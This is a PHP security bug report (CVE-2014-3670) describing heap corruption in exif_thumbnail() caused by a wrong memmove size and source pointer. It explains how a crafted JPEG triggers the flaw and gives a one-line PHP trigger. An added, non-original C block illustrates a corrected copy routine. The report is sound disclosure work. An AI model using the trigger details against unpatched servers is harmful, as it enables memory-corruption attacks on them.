PHP :: Sec Bug #68113 :: Heap corruption in exif_thumbnail()
| Sec Bug #68113 | Heap corruption in exif_thumbnail() | | |
|---|---|---|---|
| Submitted: | 2014-09-28 23:31 UTC | Modified: | 2014-10-14 17:41 UTC |
| From: | stas@php.net | Assigned: | |
| Status: | Closed | Package: | EXIF related |
| PHP Version: | 5.4.33 | OS: | * |
| Private report: | No | CVE-ID: | 2014-3670 |
[2014-09-28 23:31 UTC] stas@php.net
Description:
------------
Report by Otto Ebeling:

Hi,

I'd like to report a bug that causes heap corruption when parsing the thumbnail of a specially crafted .jpg image. Could you confirm that you can repro and provide an estimated timeline for releasing the fix, so we can coordinate this with the HHVM team as HHVM contains the affected code as well?

Details:

PHP provides APIs such as exif_thumbnail that can be used to extract embedded thumbnails from various image formats. In the process of extracting a TIFF-formatted EXIF thumbnail from a JPEG image, PHP re-encodes most IFD tags present in the thumbnail directory and prepends them to the thumbnail image in order to produce a standalone TIFF file. Individual values are re-encoded using the exif_ifd_make_value function. If this function is asked to write out an array of floating point values (single or double precision), it erroneously uses the size of the whole array when copying individual elements using memmove, leading to heap corruption.

See: https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2447

byte_count is the length of the entire array as calculated at https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2390

In addition to this, the 'from' pointer of the memmove calls points to the pointer to the array, not its contents. Instead of &info_data->value.f, the code should be using &info_value->f.

To exploit a target application that uses this API (or exif_read_data with suitable parameters), a malicious user can trigger this condition by supplying a tag that contains an array of floating-point values, and further tags that indicate the presence of a TIFF thumbnail. The image itself need not be valid as long as exif_ifd_make_value gets invoked.

Example .jpg file (xxd format) that causes a SIGSEGV on PHP 5.6.0:

Script:

```php
<?php exif_thumbnail("corrupt_heap.jpg"); ?>
```

Regards,
Otto Ebeling
Facebook Security Infrastructure
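Added here as an illustration of the fix the report asks for, not PHP's own exif.c code: a simplified C model of a tag-value serializer that copies a FLOAT or DOUBLE array one element at a time, using the per-element size for each memmove and the element's own storage as the source, with a destination bounds check on the whole-array byte_count. The `tag_elem`, `make_value` and `self_check` names are assumptions; TIFF_FLOAT/TIFF_DOUBLE are the TIFF 6.0 type codes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the tag value storage (not PHP's own
 * image_info_value struct); FLOAT/DOUBLE are the TIFF 6.0 type codes. */
typedef union { float f; double d; } tag_elem;
enum { TIFF_FLOAT = 11, TIFF_DOUBLE = 12 };

/* Serialize `count` FLOAT or DOUBLE elements into `out`.
 * Returns the bytes written, or 0 on an unsupported type or when `out`
 * cannot hold the whole array. The total byte_count is used only for the
 * bounds check and the return value; each memmove copies exactly one
 * element, sourced from that element's storage, not from a pointer variable. */
size_t make_value(int type, const tag_elem *elems, size_t count,
                  unsigned char *out, size_t out_len)
{
    size_t elem_size = (type == TIFF_FLOAT) ? sizeof(float)
                     : (type == TIFF_DOUBLE) ? sizeof(double) : 0;
    if (elem_size == 0 || count > out_len / elem_size) return 0;
    size_t byte_count = count * elem_size;
    for (size_t i = 0; i < count; i++) {
        const void *src = (type == TIFF_FLOAT) ? (const void *)&elems[i].f
                                               : (const void *)&elems[i].d;
        memmove(out + i * elem_size, src, elem_size);  /* one element, not byte_count */
    }
    return byte_count;
}

/* Round-trip check: encode three floats, decode them back, and confirm a
 * too-small destination is refused instead of overrun. Returns 1 on success. */
int self_check(void)
{
    tag_elem v[3];
    unsigned char buf[3 * sizeof(float)], small[2 * sizeof(float)];
    float back[3];
    v[0].f = 1.5f; v[1].f = -2.0f; v[2].f = 0.25f;   /* constructed sample values */
    if (make_value(TIFF_FLOAT, v, 3, buf, sizeof buf) != sizeof buf) return 0;
    memcpy(back, buf, sizeof back);
    if (back[0] != 1.5f || back[1] != -2.0f || back[2] != 0.25f) return 0;
    if (make_value(TIFF_FLOAT, v, 3, small, sizeof small) != 0) return 0;
    return 1;
}

int main(void)
{
    int ok = self_check();
    printf("self_check: %s\n", ok ? "ok" : "FAILED");
    return ok ? 0 : 1;
}
```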
Patches: exif-fix (last revision 2014-09-29 00:00 UTC by stas@php.net)
History
[2014-09-29 05:34 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2014-3670
[2014-10-14 17:42 UTC] stas@php.net
-Status: Open +Status: Closed